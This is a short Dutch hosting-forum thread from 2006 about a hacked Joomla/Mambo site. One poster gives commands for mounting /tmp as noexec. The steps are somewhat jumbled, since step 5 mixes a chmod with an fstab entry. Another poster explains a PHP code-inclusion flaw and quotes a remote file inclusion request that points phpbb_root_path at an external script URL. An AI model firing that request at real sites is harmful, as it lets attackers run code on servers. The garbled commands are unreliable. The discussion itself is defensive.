Gaat zo te zien om een Joomla/Mambo installatie![]()
Likes: 0
Gaat zo te zien om een Joomla/Mambo installatie![]()
Park The Hosting Manager - your friend in hosting software
Even je /tmp directory op noexec zetten.
Mocht je /tmp partitie vergeten zijn:
1) dd if=/dev/zero of=/tmp_file bs=1k count=2000000 (2 GB)
2) mke2fs -j /tmp_file (Antwoord Yes)
3) mount -t ext3 /tmp_file /tmp
4) Entry /etc/fstab (voorzichtig!):
5) chmod 777 /tmp/tmp_file /tmp ext3 loop,noexec,rw 0 0
Good luck,
Edit: Inderdaad niet de netste manier, maar werkt (gelukkig) wel.... nu ik me bedenk, waarom in godsnaam ext3.
Laatst gewijzigd door XF-RICK; 15/07/06 om 03:34.
Werkt niet bij deze exploitsOorspronkelijk geplaatst door XF-RICK
![]()
Klopt, dit is een zgn. "code inclusion" fout; hierdoor is het mogelijk om een extern PHP-script uit te laten voeren via de server. Overigens kwamen we de volgende veiligheidsfout ook tegen in Joomla (i.c.m. PHPbb - what else) :
http://www.joomlastuff.org/component...wtopic/t,2937/Code:components/com_forum/download.php?phpbb_root_path=http://url.van.script/dat.moet/worden.uitgevoerd/
DreamHost.nl Web hosting - cPanel hosting om bij weg te dromen.